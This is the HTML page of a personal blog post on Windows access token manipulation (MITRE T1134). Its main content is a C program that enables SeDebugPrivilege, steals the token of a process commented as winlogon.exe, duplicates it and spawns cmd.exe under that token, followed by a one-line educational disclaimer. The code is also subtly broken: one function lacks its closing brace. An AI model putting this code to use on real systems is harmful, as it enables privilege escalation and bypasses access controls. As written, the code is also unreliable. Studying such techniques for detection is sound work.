<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <link rel="stylesheet" type="text/css" href="../style.css">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="Ernest Ivanov CV">
    <link href="svg/favicon.ico" rel="icon" type="image/x-icon" />
    <meta name="keywords" content="Ernest Ivanov CV, Ernest CV, Ivanov CV">
    <title>Ernest Ivanov | $BLOG | WHAT IS ACCES TOKEN MANIPULATION</title>
  </head>
  <body>
    <div class="article">
      <div class="myblog">
        <h1>MyBlog</h1>
        <hr>
        <div class="blog-links">
            <div class="blog-links-box">
                <h2>What is Acces Token Manipulation</h2>
                <p>Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.</p>
            </div>
            <div class="blog-links-box">
                <h2>Few Ways to Obtain Acces Tokens</h2>
                <ul><li>Stealing access tokens</li><li>Creating a new process with a stolen access token</li><li>Creating Logon sessions</li></ul>
            </div>
            <div class="blog-links-box">
                <h2>Basic Acces Token Manipulation Program</h2>
                <textarea id="w3review" name="w3review" rows="73" cols="100">
#include &lt;stdio.h&gt;
#include &lt;windows.h&gt;
#pragma comment(lib, "advapi32.lib")

void EnablePrivileges(HANDLE hToken, LPCTSTR lpszPrivilege, BOOL bEnablePrivilege) {

	// HANDLE hToken // Handle where the stolen access token will be stored
	// LPCTSTR PrivName // Privilege name to enable/disable
	// BOOL EnablePrivilege // Enable/Disable privilege

	TOKEN_PRIVILEGES tp;
	LUID luid; // A pointer to recieve LUID of the privilege on local system

	LookupPrivilegeValue(NULL, lpszPrivilege, &luid);


	tp.PrivilegeCount = 1;
	tp.Privileges[0].Luid = luid;
	if (bEnablePrivilege)
	{
		tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
	}
	else {
		tp.Privileges[0].Attributes = 0;
	}

	AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL);



int main()
{
	int pid_to_impersonate = 2428; // Replace this by the PID of a remote process | winlogon.exe
	HANDLE TokenHandle = NULL; // Handle to store the remote process token
	HANDLE DuplicateTokenHandle = NULL; // Handle to store the duplicated remote process token
	STARTUPINFO startupInfo;
	PROCESS_INFORMATION processInformation;
	ZeroMemory(&startupInfo, sizeof(STARTUPINFO));
	ZeroMemory(&processInformation, sizeof(PROCESS_INFORMATION));
	startupInfo.cb = sizeof(STARTUPINFO);


	// Here we get the current process token
	HANDLE CurrentTokenHandle = NULL;
	BOOL getCurrentToken = OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &CurrentTokenHandle);


	// Finally enable the SE_DEBUG_PRIVILEGE
	EnablePrivileges(CurrentTokenHandle, SE_DEBUG_NAME, TRUE);

	// Now we retrieve a handle to the target process and steal it's token
	HANDLE rProc = OpenProcess(PROCESS_QUERY_INFORMATION, TRUE, pid_to_impersonate);

	BOOL rToken = OpenProcessToken(rProc, TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY | TOKEN_QUERY, &TokenHandle);


	// Now we impersonate the current user's token
	BOOL ImpersonateUser = ImpersonateLoggedOnUser(TokenHandle);


	// We duplicate the token, and create a new process using it
	DuplicateTokenEx(TokenHandle, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &DuplicateTokenHandle);


	CreateProcessWithTokenW(DuplicateTokenHandle, LOGON_WITH_PROFILE, L"C:\\Windows\\System32\\cmd.exe", NULL, 0, NULL, NULL, &startupInfo, &processInformation);

	return 0;
}</textarea>
                <p>It should be noted that this program is made only for educational purposes.</p>
            </div>
            <h2>Source to read</h2>
            <p><a href="https://www.manageengine.com/products/eventlog/cyber-security/access-token-manipulation.html" target="_blank">What is Acces Token Manipulation</a></p>
            <p><a href="https://attack.mitre.org/techniques/T1134/" target="_blank">Acces Token Manipulation</a></p>
            <p><a href="https://www.youtube.com/watch?v=RMVyYvt0bLY" target="_blank">Detecting Access Token Manipulation</a></p>
            <a href="../blog.html">$BLOG</a>
        </div>
      </div>
      <div class="sidebar-ico">
        <div id="codeberg">
          <a href="https://codeberg.org/ivanov364" target="_blank"><img src="../img/Codeberg logo.svg" alt="codeberg img"></a>
        </div>
        <div id="protonmail">
          <a href="mailto:ivanov364@proton.me"><img src="../img/6953970.jpg" alt="protonmail img"></a>
      </div>
    </div>
  </body>
</html>
